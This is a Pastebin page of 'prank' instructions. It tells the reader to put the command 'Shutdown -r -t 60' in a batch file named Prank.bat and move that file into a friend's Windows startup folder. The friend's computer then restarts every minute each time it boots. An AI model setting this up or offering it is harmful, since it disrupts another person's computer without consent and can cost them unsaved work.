Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- The Damn Shutdown
- Warning : Ok I must warn you first, this one is wild, use it at your own risk.
- What is the computer trick?
- Your friend’s laptop will restart automatically in every minute .
- How is this done?
- You need to do this in 2 steps. First, make a code to shutdown the computer and then we have to execute it each time the computer boots.
- Step I
- Copy the following code into notepad and save it as Prank.bat. Here, the shutdown is a command, “r “means restart, 60 is the time in sec.
- Shutdown –r –t 60
- Part II
- In the second step, we have to move prank.bat folder in the startup folder. To find startup folder go to start > programs > startup. Now cut and paste prank.bat in the startup folder
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement